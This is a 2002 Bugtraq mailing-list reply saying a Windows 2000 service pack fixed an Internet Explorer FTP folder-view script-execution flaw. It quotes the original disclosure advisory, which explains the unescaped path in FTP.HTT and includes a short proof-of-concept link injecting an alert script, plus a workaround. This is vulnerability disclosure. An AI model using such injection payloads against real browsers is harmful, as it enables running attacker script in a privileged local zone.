This problem (BugtraqID:4954) was corrected in Windows 2000 Service Pack 3. Windows2000 SP3 (Q316890) http://support.microsoft.com/default.aspx?scid=kb;en-us;q316890 Regards, ------------------------------------------------------ Eiji "James" Yoshida penetration technique research site E-mail: zaddik@geocities.co.jp URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm ------------------------------------------------------ ----- Original Message ----- From: "Eiji James Yoshida" <ptrs-ejy@bp.iij4u.or.jp> To: <bugtraq@securityfocus.com> Sent: Friday, June 07, 2002 12:33 AM Subject: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > + Title: > ~~~~~~~~~~~~~~~~~ > Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability > > > + Date: > ~~~~~~~~~~~~~~~~~ > 7 June 2002 > > > + Author: > ~~~~~~~~~~~~~~~~~ > Eiji James Yoshida [zaddik@geocities.co.jp] > > > + Risk: > ~~~~~~~~~~~~~~~~~ > Medium > > > + Vulnerable: > ~~~~~~~~~~~~~~~~~ > Windows2000 SP2 IE5.5SP1 > Windows2000 SP2 IE5.5SP2 > Windows2000 SP2 IE6.0 > > > + Overview: > ~~~~~~~~~~~~~~~~~ > IE allows running Malicious Scripts due to a bug in 'folder View for FTP sites'. > > If you enable both an 'Enable folder view for FTP sites' IE Advanced Setting > and an 'Enable Web content in folders' Explorer Folder Option, > the script embedded in FTP Server Address will run. > (Both options are set to 'Enable' by default.) > > * It's important that the script runs in the My Computer zone! > > > + Details: > ~~~~~~~~~~~~~~~~~ > The problem is in FTP.HTT invoked by the 'folder view for FTP sites' feature. > ( %SystemRoot%\WEB\FTP.HTT ) > > - --------------------FTP.HTT-------------------- > 35: <BASE href="%THISDIRPATH%\"> > - ----------------------------------------------- > > This '%THISDIRPATH%' is not escaped. > > (Example 1) > [ ftp://TARGET ] > '%THISDIRPATH%' = 'ftp://TARGET/' > <BASE href="ftp://TARGET/\"> > ~~~~~~~~~~~~~ > (Example 2) > [ ftp://"><script>alert("Exploit");</script> ] > '%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/' > <BASE href="ftp://"><script>alert("Exploit");</script>/\"> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > + Exploit code: > ~~~~~~~~~~~~~~~~~ > <a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a> > > > + Demonstration: > ~~~~~~~~~~~~~~~~~ > http://www.geocities.co.jp/SiliconValley/1667/advisory02e.html > > > + Workaround: > ~~~~~~~~~~~~~~~~~ > Disable either 'Enable folder view for FTP sites' IE Advanced Setting > or 'Enable Web content in folders' Explorer Folder Option. > > > + Vendor status: > ~~~~~~~~~~~~~~~~~ > Microsoft was notified on 21 December 2001. > > > - ---------------------------------------------------------------------- > Eiji "James" Yoshida > penetration technique research site > E-mail: zaddik@geocities.co.jp > URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm > - ---------------------------------------------------------------------- > > -----BEGIN PGP SIGNATURE----- > Version: PGP 6.5.8ckt > Comment: Eiji James Yoshida > > iQA/AwUBPP93/TnqpMRtMot1EQJE+gCg3tezyI7XyhSatXTXkjuwTqkiuroAoOkA > 55mgpZ0K8d9mx/c0pS2Knqoe > =PTNT > -----END PGP SIGNATURE----- > > > >
